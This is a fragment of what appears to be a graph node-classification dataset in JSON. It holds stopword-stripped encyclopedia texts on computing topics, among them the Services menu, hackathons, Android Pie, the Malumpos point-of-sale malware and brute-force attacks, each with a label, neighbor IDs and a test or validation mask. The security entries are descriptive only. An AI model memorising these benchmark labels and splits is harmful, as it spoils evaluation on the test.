    "text": "Services_menu:services menu services menu simply services user interface element computer operating system services programs accept input user selection process optionally put result back clipboard concept originated nextstep operating system carried macos gnustep similar features emulated operating systems apple advertises services menu connection features operating system example possible desktop search piece text selecting mouse using service spotlight central services grab taking screenshots system spell checker concept similar gui equivalent unix pipe allowing arbitrary data processed passed programs services implemented application services expose portion functionality application operate selected data usually without displaying interface developer documentation apple recommends applications use services provide features generally useful giving example usenet client providing rot13 encryption service standalone services may also created without host application simple one-purpose nature fact n't require gui designed makes writing standalone services popular beginner macos programming projects since many applications install entries without asking user macos services menu tends clog dozens entries quickly users ever use small subset possible options therefore cutting customizing menu makes faster pleasant use prior mac os x snow leopard third party software required snow leopard services menu customized keyboard pane system preferences point view software services menu means inter-process communication user interface executing actions selected data emulation services menu based fact several ways achieved operating system even macos alternative system called context menu handler carried classic mac os x window system data selected application available programs thus services menu application retrieves current selection lets user choose action missing part returning processed data back originating application instead service open new window show results alternatively service could replace current cut buffer results operation leaving user perform paste since different toolkits implement copy/select paste commands differently probably external program control",
    "neighbors": [
      576,
      8997,
      3719,
      9035,
      7983,
      8304,
      8499,
      3350,
      8414,
      7806
    ],
    "mask": "Test"
  },
  {
    "node_id": 7545,
    "label": 4,
    "text": "The_Digital_Standard:digital standard digital standard technical standard offers product testing criteria software smart devices consumers manufacturers use standards evaluate extent product protects various digital rights including consumer privacy information security freedom speech product ownership consortium organizations including consumer reports disconnect mobile ranking digital rights cyber independent testing lab aspiration presented standard march 2017 intended use standard encourage consumer manufacturer evaluate discuss impact product digital features individuals society since standard list questions anyone answer questions product generate evaluation supporters standard argue answers questions either obvious manufacturers voluntarily disclose answers goals standard include setting consumer expectations products protect communicating acceptable practices manufacturers encouraging conversations sorts product behavior either beneficial harmful consumers use digital standard makes 4 assertions digital rights foundation assertions digital standard claims good products following characteristics standard work progress actively seeking comments participation anyone cares digital rights time standard release organizations established made statements contributions partnering others representative consumer technology association expressed wish anyone using standard evaluate product describe calculated score limitations score communicates peiter zatko cyber independent testing lab said need shed light industry really n't caring build quality software safety craig newmark speaking board member consumer reports advocate digital rights commented standard urgently needed statements project organizers published third-party media",
    "neighbors": [
      11221,
      5636,
      5373,
      9214
    ],
    "mask": "None"
  },
  {
    "node_id": 7546,
    "label": 5,
    "text": "SmartFTP:smartftp smartftp network file transfer program microsoft windows supports file transfer via ftp ftps sftp webdav amazon s3 google drive microsoft onedrive box google cloud storage backblaze b2 protocols supports ssl/tls ipv6 fxp features transfer queue proxy firewall support multiple connections chmod features drag-and-drop software uses windows api interface available ia-32 x64 editions windows prior july 2008 program free home non-profit users july 7 2008 post smartftp forums announced software longer free use smartftp available three editions",
    "neighbors": [
      11201,
      5380,
      7364,
      11178,
      2797,
      6797,
      7983,
      4725,
      5754,
      5470
    ],
    "mask": "None"
  },
  {
    "node_id": 7547,
    "label": 2,
    "text": "Hackathon:hackathon hackathon also known hack day hackfest codefest design sprint-like event computer programmers others involved software development including graphic designers interface designers project managers others often including domain experts collaborate intensively software projects goal hackathon create usable software hardware goal creating functioning product end event hackathons tend specific focus include programming language used operating system application api subject demographic group programmers cases restriction type software created word hackathon portmanteau words hack marathon hack used sense exploratory programming alternate meaning reference computer security openbsd apparent first use term referred cryptographic development event held calgary june 4 1999 ten developers came together avoid legal problems caused due export regulations cryptographic software united states since three-to-five events per year occurred around world advance development generally university campuses sun usage referred event javaone conference june 15 june 19 1999 john gage challenged attendees write program java new palm v using infrared port communicate palm users register internet starting mid late 2000s hackathons became significantly widespread began increasingly viewed companies venture capitalists way quickly develop new software technologies locate new areas innovation funding major companies born hackathons groupme began project hackathon techcrunch disrupt 2010 conference 2011 acquired skype 85 million software phonegap began project iphonedevcamp later renamed iosdevcamp 2008 company whose engineers developed phonegap nitobi refocused around phonegap nitobi bought adobe 2011 undisclosed amount hackathons typically start one presentations event well specific subject participants suggest ideas form teams based individual interests skills main work hackathon begins last anywhere several hours several days hackathons last 24 hours longer especially competitive ones eating often informal participants often subsisting food like pizza energy drinks sometimes sleeping informal well participants sleeping on-site sleeping bags end hackathons usually series demonstrations group presents results capture great ideas work-in-progress often people post video demonstrations blog results screenshots details share links progress social media suggest place open source code generally make possible people share learn possibly build ideas generated initial work completed sometimes contest element well panel judges select winning teams prizes given many hackathons judges made organisers sponsors barcamp-style hackathons organised development community iosdevcamp judges usually made peers colleagues field prizes sometimes substantial amount money social gaming hackathon techcrunch disrupt conference offered 250,000 funding winners controversial 2013 hackathon run salesforce.com payout 1 million winners billed largest-ever prize hackathons focus particular platform mobile apps desktop operating system web development video game development mobile app hackathons like air held phoenix park ireland see large amount corporate sponsorship interest music hack day hackathon music-related software hardware applications popular event held 30 times around world since 2009 also music tech fest three-day interdisciplinary festival music ideas bringing together musicians hackers researchers industry features hackathon similarly science hack day hackathon making things science held 45 times 15 countries around world since 2010 hackathons held develop applications run various mobile device operating systems android ios meego hackathons also held develop video-based applications computer games hackathons video games developed sometimes called game jams tv hackfest events held london san francisco focusing mainly social television second screen technologies tv hackfests challenge briefs typically submitted content producers brands form broadcast industry metadata video content sponsors supply apis sdks pre-existing open source software code hackathons also used life sciences advance informatics infrastructure supports research open bioinformatics foundation ran two hackathons member projects 2002 2003 since 2010 held 2-day codefests preceding annual conference national evolutionary synthesis center co-organized sponsored hackathons evolutionary bioinformatics since 2006 biohackathon annual event started 2008 targeted advancing standards enable interoperable bioinformatics tools web services neuroscientists also used hackathons bring developers scientists together address issues range focusing specific information system e.g. neurosynth hackathon allen brain atlas hackathon providing reserved time broad scientific inquiry e.g. brainhack using specific challenges focus hacking activity e.g. hbm hackathon hackathons devoted creating applications use specific language framework like javascript node.js html5 ruby rails hackathons focus applications make use application programming interface api single company data source open hack event run publicly yahoo since 2006 originally known hack day open hack day focused usage yahoo api addition apis websites owned yahoo like flickr company open hack india event 2012 700 attendees google run similar events apis travel guide company lonely planet website foursquare notably held large global hackathon 2011 500 developers 30 sites around world competed create applications using foursquare api second foursquare hackathon 2013 around 200 developers ietf organizes hackathons ietf meetings focused ietf internet draft ietf rfc implementation better inter-operability improved internet standards number hackathons devoted improving government specifically cause open government one event 2011 hosted united states congress starting 2012 nasa annually hosting international space apps challenge 2014 british government hackernest ran dementiahack world first hackathon dedicated improving lives people living dementia caregivers series continues 2015 adding canadian government facebook major sponsors global game jam largest video game development hackathon often includes optional requirements called 'diversifiers aim promote game accessibility causes various hackathons held improve city transit systems hackathons aimed improvements city local services increasing one london councils hackney creating number successful local solutions 2 day hackney-thon also number hackathons devoted improving education including education hack day smaller scale looking specifically challenges field work based geography education field studies council hosted fschackday random hacks kindness another popular hackathon devoted disaster management crisis response theport instead hackathon devoted solving humanitarian social public interest challenges hosted cern partners non-governmental organizations icrc undp number hackathons around world planned memory computer programmer internet activist aaron swartz died 2013 hackathons intended programmers within certain demographic group like teenagers college students women hackathons colleges become increasingly popular united states elsewhere usually annual semiannual events open college students universities often competitive awards provided university programming-related sponsors many supported organization major league hacking founded 2013 assist running collegiate hackathons pennapps university pennsylvania first student-run college hackathon 2015 became largest college hackathon 12th iteration hosting 2000 people offering 60k prizes university mauritius computer club cyberstorm.mu organized hackathon dubbed code wars focused implementing ietf rfc lynx 2017 shamhacks missouri university science technology held annually outreach activity campus curtis laws wilson library shamhacks 2018 focused problem statements better quality life factors us veterans pairing veteran-owned company sponsors companies hold internal hackathons promote new product innovation engineering staff example facebook like button conceived part hackathon hackathons startupbus founded 2010 australia combine competitive element road trip connect local tech communities multiple cities along bus routes taking place across north america europe africa australasia hackathons work single application operating system programming language content management system events often known code sprints especially popular open source software projects events sometimes opportunity developers meet face-to-face code sprints typically last one week three weeks often take place near conferences team attend unlike hackathons events rarely include competitive element annual hackathon work operating system openbsd held since 1999 one event may originated word hackathon",
    "neighbors": [
      0,
      6657,
      5636,
      7044,
      3462,
      6790,
      10756,
      11659,
      10392,
      7449,
      8735,
      5677,
      7983,
      6588,
      9665,
      8262,
      3404,
      8146,
      3290,
      4956,
      2275,
      1764,
      9704,
      10090,
      5356,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 7548,
    "label": 2,
    "text": "Android_Pie:android pie android pie codenamed android p development ninth major release 16th version android mobile operating system first released developer preview march 7 2018 released publicly august 6 2018. 10.4 android devices checking google play run pie android pie referred android p first announced google march 7 2018 first developer preview released day second preview considered beta quality released may 8 2018 third preview called beta 2 released june 6 2018 fourth preview called beta 3 released july 2 2018 final beta android p released july 25 2018 august 6 2018 google officially announced final release android 9 title pie update initially available current google pixel devices releases android one devices others follow later year essential phone first third-party android device receive update pie notably coming day-and-date final release sony xperia xz3 first device android pie pre-installed august 2019 handful notable custom android distributions roms 9.0 pie see list custom android distributions android pie utilizes refresh google material design language unofficially referred material design 2.0 revamp provides variance aesthetics encouraging creation custom themes base guidelines components rather standardized appearance bottom-aligned navigation bars also prominent applied android pie interface rounded corners influenced proprietary google theme used in-house software implementing material design 2.0 prominent addition pie contains official support screen cutouts notches including apis system behaviors depending size position android certification requirements restrict devices two cutouts may along top bottom screen significant user interface change pie redesigned on-screen navigation bar unlike previous versions android consists slim home button back button rendered available bar utilizes gesture navigation swiping opens overview screen redesign existing recent apps menu swiping handle right activates application switching gesture bar used primarily new devices pixel 3 existing devices may either use previous navigation key setup offer ability opt gesture navigation opposed previous recent apps menu overview utilizes horizontal layout rather vertical text may also selected copied apps appearing although uses ocr rather native text conserve resources pixel launcher exclusively supports ability access app drawer recently used apps overview well however integration proprietary current plans offer necessary integration third-party software due security concerns addition rotation lock enabled rotating device causes screen rotation button appear navigation bar notification area redesigned clock moved left number icons may displayed limited four order accommodate displays may notch cutouts center drop-down panels attached quick settings items removed long-pressing toggle directs users relevant settings screen notifications chats threaded displaying previous messages within complementing existing inline reply functionality particular type notification frequently dismissed user offered disable disturb mode overhauled larger array settings power menu contains screenshot button supports cropping image taking one optional lockdown mode disables biometric unlock methods volume pop-up controls media volume well choice sound vibrate silent modes notifications users directed settings menu change volume notifications magnifier display added text selection smart linkify offers access relevant apps particular types text phone numbers addresses highlighted android pie introduces major change power management using algorithms prioritize background activity apps based long-term usage patterns predictions dividing apps active working set run often frequent rare never similar adaptive brightness settings adjusted automatically based detected lighting conditions features developed collaboration deepmind precomputedtext api also available compatibility library compatible android 4.0 newer used perform text display processing background thread opposed ui thread improve performance fingerprint authentication api also revamped account different types biometric authentication experiences including face scanning in-screen fingerprint readers android runtime create compressed bytecode files profiler data uploaded google play servers bundled apps downloaded users similar device apps targeting older android api levels beginning android 4.2 display warning launched google play store requiring apps target api level released within past year also mandate 64-bit support 2019 android pie supports ieee 802.11mc including wi-fi round trip time location positioning camera api supports accessing multiple cameras apps may longer perform background audio video recording unless run foreground service support high efficiency image format subject patent licensing hardware support vp9 profile 2 dns tls supported name private dns android go android pie uses less storage previous release enhancements security storage tracking shortly launch several users pixel devices essential phone noted decrease battery life android pie became available phones users various devices reported similar comparisons",
    "neighbors": [
      5637,
      11273,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      10284,
      5677,
      1083,
      6212,
      69,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      8285,
      2658,
      8821,
      11391,
      1670,
      7816,
      5262,
      10393,
      8858,
      7835,
      673,
      8870,
      1191,
      1203,
      7359,
      196,
      3269,
      3782,
      8907,
      2258,
      2259,
      3795,
      1240,
      8413,
      9949,
      6367,
      5857,
      1255,
      236,
      8940,
      9970,
      3836,
      5892,
      7428,
      2828,
      280,
      10009,
      4890,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      3380,
      5431,
      2875,
      3900,
      10045,
      11590,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      4995,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      9115,
      2978,
      1959,
      937,
      5546,
      3499,
      6057,
      7595,
      11184,
      2001,
      479,
      6632,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252,
      8698,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 7549,
    "label": 3,
    "text": "PowerBook_500_series:powerbook 500 series powerbook 500 series codenamed blackbird shared older macintosh iifx range apple macintosh powerbook portable computers first introduced apple computer 540c model may 16 1994 first stereo speakers trackpad ethernet networking built-in first powerbook series use motorola 68lc040 cpu simultaneous duo 280 upgradeable powerpc architecture via swap-out cpu daughter card powerpc 68040 upgrades sale use 9.5-inch dual scan passive color/b w displays 16-bit stereo sound stereo speakers expansion bay pc card capability two battery bays ten-minute sleep/clock battery allowed main batteries swapped sleep mode full-size keyboard f1–f12 function keys able sleep connected external monitor battery contact cover included actual batteries included single serial port could connect serial printer network via apple localtalk another first also included aaui port connecting ethernet networks 500 series discontinued completely introduction ill-fated powerbook 5300 powerbook 190 de facto successor 500 continued 68lc040 processor offering low end powerpc-based powerbook family survey taken november 2000 insanely great macintosh ranked 540c 2 list all-time best powerbook models made powerbook 500 series introduced may 16 1994 high-end active matrix lcd powerbook 540c 540 passive matrix 520c 520 soon one marketing highlights promise powerpc upgrade cpu pc card pcmcia expansion introduction model came time apple changeover new powerpc chip 68k line cpus apple advertising promise powerpc cause headaches company strong demand ground-breaking design apple incorrect market prediction customers would wait fully powerpc powerbooks resulted shortages early due course 540 dropped line 8 mb additional memory modem offered installed factory hard drive capacity increased 160 240 320 500 mb installed system upped system 7.1.1 7.5 pc card cage also released allowing macintosh users add pcmcia capability laptops first time 1995 apple gave permission apple japan introduce updated version called 550c bigger display 10.4 inches cpu fpu 68040 bigger hard drive japanese keyboard black case sold japan never received fcc certification delays new powerpc powerbook 5300 demand ppc upgrade mounted newer technology began market upgrade apple although produced upgrade modules apple first offered 117 mhz versions apple 100 actually 99 mhz offering soon thereafter newer technology introduced 167 mhz model outperformed fastest powerbook 5300 6,800 5300ce time problems line became real issue apple time apple introduced powerbook 1400 newer technology introduced 183 mhz upgrade 128 kb l2 cache kept ahead power curve performance newer technology stated could produce 183 mhz upgrades supply connectors exhausted laptop first industry include among apple powerbook line first although 500 blackbird prototypes black one five production models completely black 550c sold japan 550c differed four two-tone grey models key respects well including larger active-matrix color screen combined roman/kanji keyboard full 68040 processor models charcoal grey darker grey trim came variety displays active/passive matrix color greyscale used 68lc040 processor low-cost variant without math co-processor full-sized keyboard 12 function keys 640×480 resolution display consistent across family modem developed global village unique two-part design transceiver modem connector installed back modem located next cpu daughter card v.32 terbo top rate 19.2 kbit/s v.32 terbo modems official standard otherwise would drop 14.4 kbit/s due bug new combined printer/modem port driver upgraded 2.5.5 chooser replaced gv install 500 series powerbooks included ability use two batteries time allowing 4 hours battery life two installed charged batteries however left battery also internal pds slot allowed custom modules installed despite prototypes made two devices reached market one pcmcia module three versions reva revb revc revc useful take 16bit wifi cards allowing possibility get powerbook 5xx connected online home network using technology developed powerbook 5xxs discontinued apple different revisions pcmcia module released apple accommodate developing pcmcia standard modules difficult find revc module particular demand alone works 16-bit wifi cards br pc card pcmcia cage 16-bit 2 type i/ii 1 type iii cards using 68000 cpu convert pc card protocol pds fpu co-processor make lack one powerbook 68lc040 cpu fpu module uses 68882 fpu co-processor made sonnet total almost 600,000 powerbook 500 series units produced compared 300,000 powerbook 5300 units laptops grayscale displays mono speakers 8-bit audio insufficient battery life side-mounted snap-on track balls built-in ethernet via versatile aaui transceiver scsi port forerunner today ’ firewire adb similar usb features desktops time making first viable desktop replacement laptops",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      7305,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      1772,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7550,
    "label": 9,
    "text": "MUSIC-N:music-n music-n refers family computer music programs programming languages descended influenced music program written max mathews 1957 bell labs music first computer program generating digital audio waveforms direct synthesis one first programs making music actuality sound digital computer certainly first program gain wide acceptance music research community viable task world first computer-controlled music generated australia programmer geoff hill csirac computer designed built trevor pearcey maston beard however csirac produced sound sending raw pulses speaker produce standard digital audio pcm samples like music-series programs music-n derivative programs more-or-less common design made library functions built around simple signal-processing synthesis routines written opcodes unit generators simple opcodes constructed user instrument usually text-based instruction file increasingly graphical interface defines sound played second file called score specifies notes durations pitches amplitudes parameters relevant musical informatics piece variants language merge instrument score though still distinguish control-level functions operate music functions run sampling rate audio generated operate sound notable exception chuck unifies audio-rate control-rate timing single framework allowing arbitrarily fine time granularity also one mechanism manage advantage flexible readable code well drawbacks reduced system performance music-n derived software mostly available complete self-contained programs different types user-interfaces text- gui-based ones aspect csound rtcmix since evolved work effectively software libraries accessed variety frontends programming languages c c++ java python tcl lua lisp scheme etc. well music systems pure data max/msp plugin frameworks ladspa vst number highly original day largely unchallenged assumptions implemented music descendants best way create sound computer many mathew implementations using pre-calculated arrays waveform envelope storage use scheduler runs musical time rather audio rate norm hardware software synthesis audio dsp systems today music included number variants e.g structured audio orchestra language saol imperative music-n programming language part mpeg-4 audio standard eric scheirer less obviously music seen parent program music iv computer music synthesis software package written max mathews program expansion earlier packages written mathews produce music direct digital computation could heard converting samples audible sound using digital-to-analog converter dac music iv expanded godfrey winham hubert howe music ivb music ivbf portable version written fortran precursor csound music iv allows programmer enter musical score text file note played particular musical instrument software algorithm instruments supplied package programmer supply new instruments form fortran code compiled called music iv package generate output designed package intended real-time generation music done modern portable electronic keyboard instrument instead entire songs musical pieces encoded processed digital file disk tape containing stream samples prior advent low-cost digital audio gear late 1980s samples typically sent dac recorded analog tape",
    "neighbors": [
      7172,
      267,
      10508,
      7571,
      6933,
      791,
      6810,
      8474,
      1952,
      4777,
      4779,
      5037,
      5677,
      692,
      9783,
      9023,
      7108,
      3665,
      596,
      7769,
      9565,
      10083,
      6502,
      8554,
      7535,
      8947,
      372,
      2804,
      9210,
      2045,
      8958
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7551,
    "label": 5,
    "text": "MSN_Direct:msn direct msn direct fm radio-based digital service allowed 'spot portable devices receive information msn services devices supported msn direct included wristwatches desktop clocks in-car gps satellite navigation units even small appliances coffee makers information available paid channels included weather horoscopes stocks news sports results calendar notifications service also allowed users receive short messages windows live messenger garmin gps units nüvi 680 allowed traffic notifications weather forecasts movie schedules local gas prices received msn direct radio-based service msn direct universal coverage available populated parts united states canada launched areas microsoft latest expansion msn direct windows mobile platform msn direct windows mobile took advantage cellular wi-fi connections allowed microsoft devices better compete information services available mobile phone platforms three versions msn direct software garmin nüvi gps receivers version 1 available nüvis allowed users receive local gas prices movie times weather forecasts current conditions version 2 available nüvi 700- 800-series receivers offered enhanced movie listings local events news stock prices ability send microsoft ’ live search maps data nüvi version 3 offered general airport delays incoming outgoing flights individual flight delays doppler radar map viewing weather service shut january 1 2012 originally announced october 2009",
    "neighbors": [
      4704,
      3610
    ],
    "mask": "Test"
  },
  {
    "node_id": 7552,
    "label": 2,
    "text": "List_of_BSD_operating_systems:list bsd operating systems number unix-like operating systems active development descended berkeley software distribution bsd series unix variants developed originally bill joy university california berkeley electrical engineering computer science department four major bsd operating systems increasing number oss derived add remove certain features generally remain compatible originating os—and really forks list active since 2014 websites freebsd free unix-like operating system descended unix via berkeley software distribution bsd freebsd currently 200 active developers thousands contributors notable derivatives include dragonfly bsd forked freebsd 4.8 apple inc. mac os x darwin base including large amount code derived freebsd netbsd freely redistributable open source version unix-derivative berkeley software distribution bsd computer operating system second open source bsd descendant formally released 386bsd continues actively developed noted portability quality design implementation often used embedded systems starting point porting operating systems new computer architectures openbsd unix-like computer operating system descended berkeley software distribution bsd unix derivative developed university california berkeley forked netbsd 1995 openbsd includes number security features absent optional operating systems tradition developers auditing source code software bugs security problems bsd originally derived unix using complete source code sixth edition unix pdp-11 bell labs starting point first berkeley software distribution 1bsd series updated versions pdp-11 followed 2.xbsd releases 32-bit version vax platform released 3bsd 4.xbsd series added many new features including tcp/ip networking many years primary developer project leader bill joy graduate student time funding project provided darpa darpa interested obtaining programming platform programmer interface would provide robust general purpose time-sharing computing platform would become obsolete every time computing hardware replaced operating system would allow us department defense software especially intricate long-term finance logistics operations quickly ported new hardware became available time went code later ported unix system iii still later unix system v. unix system v revision 4 svr4 released circa 1992 contained much code ported bsd version including 4.3bsd",
    "neighbors": [
      5506,
      2180,
      1927,
      4745,
      10761,
      2061,
      9743,
      5397,
      8725,
      9625,
      5534,
      3488,
      1316,
      7460,
      1574,
      11689,
      684,
      4908,
      8621,
      1839,
      7983,
      2995,
      1718,
      1080,
      5177,
      6333,
      9151,
      9153,
      3651,
      7748,
      10436,
      9927,
      8395,
      7249,
      850,
      11604,
      3673,
      6361,
      6491,
      9306,
      10202,
      3551,
      607,
      998,
      9320,
      873,
      9452,
      3058,
      7027,
      5492,
      9844,
      633,
      8316,
      9342
    ],
    "mask": "Test"
  },
  {
    "node_id": 7553,
    "label": 4,
    "text": "Malumpos_Malware:malumpos malware malumpos point sale malware designed steal scrape customer ’ credit debit card detail point sale system designed way records point sale ’ data running oracle micros payment system restaurant collected data used 333,000 customer sites around world malumpos malware targets hotels us businesses put retail customers risk pos ram scraper written delphi programming language malumpos monitors processes scrapes stolen data infected pos system ram first stores stolen credit debit card details customer infected point sale system swiped sends data cybercriminal empty customer bank balance details sold black market much like point sale malware malumpos get computer unknowingly conceals identity nvidia display driver nvidia display driv3r malware appears legitimate software victims peripherals function correctly malware infects oracle micros oracle forms shift4 systems systems accessed via internet explorer",
    "neighbors": [
      10309,
      6091,
      2383,
      4945,
      6360,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 7554,
    "label": 6,
    "text": "NetWare_Core_Protocol:netware core protocol netware core protocol ncp network protocol used products novell inc usually associated client-server operating system novell netware originally supported primarily ms-dos client stations later support platforms microsoft windows classic mac os linux windows nt mac os x various flavors unix added ncp used access file print directory clock synchronization messaging remote command execution network service functions originally took advantage easy network configuration little memory footprint ipx/spx protocol stack since mid-1990s tcp/ip implementation available novell edirectory uses ncp synchronizing data changes servers directory service tree original ipx/spx implementation provided novell netware platform obsolete tcp/ip implementation uses tcp/udp port 524 relies slp name resolution ncp operation ipx/spx networks bare ipx protocol used packet type field set 17 workstation client station side ipx socket number 0x4003 used server side socket number 0x0451 ncp pdu following structure ncp type field determines type operation individual requests identified sequence number modulo 256 connection number identifies individual client station connection server novell netware servers version 2.x supported 255 connections connection number occupied 1 octet later extended 2 octets task number value 3 requests 1 replies data field starts ncp function number octet distinguishes individual services contents length rest data field depends ncp function",
    "neighbors": [
      5120,
      514,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      576,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      6797,
      654,
      2193,
      2194,
      2197,
      11413,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      10924,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      9441,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      8976,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      6993,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      5492,
      11638,
      6519,
      376,
      11128,
      890,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7626,
      9166,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 7555,
    "label": 2,
    "text": "Diskless_Remote_Boot_in_Linux:diskless remote boot linux drbl diskless remote boot linux nfs-/nis server providing diskless systemless environment client machines could used providing drbl-server installation possible machine debian ubuntu mandriva red hat linux fedora centos suse already installed unlike ltsp uses distributed hardware resources makes possible clients fully access local hardware thus making feasible use server machines less power also includes clonezilla partitioning disk cloning utility similar symantec ghost drbl comes terms gnu gpl license providing user ability customize drbl excels two main categories disk cloning clonezilla packaged drbl uses partimage avoid copying free space gzip compress hard disk images stored image restored multiple machines simultaneously using multicast packets thus greatly reducing time takes image large numbers computers drbl live cd allows without actually installing anything machines simply booting one machine server cd pxe booting rest machines hybrid client hybrid client excellent way make use old hardware using old hardware thin clients good solution disadvantages hybrid client make drbl allows one set multiple hybrid clients relative ease client computer set boot network card using pxe etherboot client requests ip address tftp image boot provided drbl server client boots initial ram disk provided drbl server via tftp proceeds mount nfs share also provided drbl server root partition client boots either linux distribution drbl server installed clonezilla installer various linux distributions depending particular client configured drbl server system resources reside local machine except storage resides drbl server main bottleneck drbl installation storage drbl server client workstation fast storage server raid fast network gigabit ethernet ideal type environment",
    "neighbors": [
      7938,
      7812,
      8326,
      4360,
      9353,
      4493,
      2195,
      11155,
      1813,
      10780,
      1694,
      3618,
      1406,
      4011,
      9646,
      7983,
      10926,
      823,
      9660,
      8254,
      10817,
      5067,
      10192,
      4561,
      8147,
      1761,
      8676,
      4841,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 7556,
    "label": 4,
    "text": "Brute-force_attack:brute-force attack cryptography brute-force attack consists attacker submitting many passwords passphrases hope eventually guessing correctly attacker systematically checks possible passwords passphrases correct one found alternatively attacker attempt guess key typically created password using key derivation function known exhaustive key search brute-force attack cryptanalytic attack theory used attempt decrypt encrypted data except data encrypted information-theoretically secure manner attack might used possible take advantage weaknesses encryption system exist would make task easier password-guessing method fast used check short passwords longer passwords methods dictionary attack used brute-force search takes long longer passwords passphrases keys possible values making exponentially difficult crack shorter ones brute-force attacks made less effective obfuscating data encoded making difficult attacker recognize code cracked making attacker work test guess one measures strength encryption system long would theoretically take attacker mount successful brute-force attack brute-force attacks application brute-force search general problem-solving technique enumerating candidates checking one brute-force attacks work calculating every possible combination could make password testing see correct password password length increases amount time average find correct password increases exponentially resources required brute-force attack grow exponentially increasing key size linearly although u.s. export regulations historically restricted key lengths 56-bit symmetric keys e.g data encryption standard restrictions longer place modern symmetric algorithms typically use computationally stronger 128- 256-bit keys physical argument 128-bit symmetric key computationally secure brute-force attack so-called landauer limit implied laws physics sets lower limit energy required perform computation per bit erased computation temperature computing device kelvins k boltzmann constant natural logarithm 2 0.693 irreversible computing device use less energy even principle thus order simply flip possible values 128-bit symmetric key ignoring actual computing check would theoretically require 2 − 1 bit flips conventional processor assumed calculation occurs near room temperature ~300 k von neumann-landauer limit applied estimate energy required ~10 joules equivalent consuming 30 gigawatts power one year equal 30×10 w×365×24×3600 9.46×10 j 262.7 twh 1 world energy production full actual computation – checking key see solution found – would consume many times amount furthermore simply energy requirement cycling key space actual time takes flip bit considered certainly greater 0 however argument assumes register values changed using conventional set clear operations inevitably generate entropy shown computational hardware designed encounter theoretical obstruction see reversible computing though computers known constructed commercial successors governmental asic solutions become available also known custom hardware attacks two emerging technologies proven capability brute-force attack certain ciphers one modern graphics processing unit gpu technology field-programmable gate array fpga technology gpus benefit wide availability price-performance benefit fpgas energy efficiency per cryptographic operation technologies try transport benefits parallel processing brute-force attacks case gpus hundreds case fpga thousand processing units making much better suited cracking passwords conventional processors various publications fields cryptographic analysis proved energy efficiency today fpga technology example copacobana fpga cluster computer consumes energy single pc 600 w performs like 2,500 pcs certain algorithms number firms provide hardware-based fpga cryptographic analysis solutions single fpga pci express card dedicated fpga computers wpa wpa2 encryption successfully brute-force attacked reducing workload factor 50 comparison conventional cpus hundred case fpgas aes permits use 256-bit keys breaking symmetric 256-bit key brute force requires 2 times computational power 128-bit key fifty supercomputers could check billion billion 10 aes keys per second device could ever made would theory require 3×10 years exhaust 256-bit key space underlying assumption brute-force attack complete keyspace used generate keys something relies effective random number generator defects algorithm implementation example number systems originally thought impossible crack brute force nevertheless cracked key space search found much smaller originally thought lack entropy pseudorandom number generators include netscape implementation ssl famously cracked ian goldberg david wagner 1995 debian/ubuntu edition openssl discovered 2008 flawed similar lack implemented entropy led breaking enigma code credential recycling refers hacking practice re-using username password combinations gathered previous brute-force attacks special form credential recycling pass hash unsalted hashed credentials stolen re-used without first brute forced certain types encryption mathematical properties defeated brute force example one-time pad cryptography every cleartext bit corresponding key truly random sequence key bits 140 character one-time-pad-encoded string subjected brute-force attack would eventually reveal every 140 character string possible including correct answer – answers given would way knowing correct one defeating system done venona project generally relies pure cryptography upon mistakes implementation key pads truly random intercepted keypads operators making mistakes – errors case offline attack attacker access encrypted material one try key combinations without risk discovery interference however database directory administrators take countermeasures online attacks example limiting number attempts password tried introducing time delays successive attempts increasing answer complexity e.g requiring captcha answer verification code sent via cellphone and/or locking accounts unsuccessful logon attempts website administrators may prevent particular ip address trying predetermined number password attempts account site reverse brute-force attack single usually common password tested multiple usernames encrypted files process may repeated select passwords strategy attacker generally targeting specific user",
    "neighbors": [
      9732,
      2053,
      519,
      2567,
      3084,
      535,
      2074,
      4128,
      4140,
      1069,
      3629,
